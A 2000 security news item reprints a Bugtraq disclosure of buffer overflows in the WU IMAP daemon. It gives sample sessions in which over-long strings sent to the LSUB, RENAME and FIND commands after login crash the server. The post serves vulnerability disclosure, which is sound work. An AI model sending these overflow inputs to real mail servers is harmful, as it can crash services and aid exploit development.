Originally Published: Saturday, 22 April 2000 Author: Alexander Reelsen
Published to: news_enhance_security/Security News Page: 1/1 - [Printable]

WU imapd reveals more and more buffer overflows

The imap daemon by the washington university seems to have a lot more overflows then suspected at first.

   Page 1 of 1  

From: Michal Szymanski Subject: Re: another WU imapd buffer overflow To: BUGTRAQ@SECURITYFOCUS.COM

Hi again,

imapd seems to be very weak. I've found another three buffer overruns. This time affected commands are LSUB, RENAME and FIND:

* OK mail IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)

SIGSEGV received.

It seems that all two-argument commands in authenticated state - where second argument is string - are vulnerable. I'm not sure, but ipop2/3d works fine in all states, also in transaction state. Mark, Am I right?

Regards,

Michal Szymanski [michal_szymanski@linux.com.pl];





   Page 1 of 1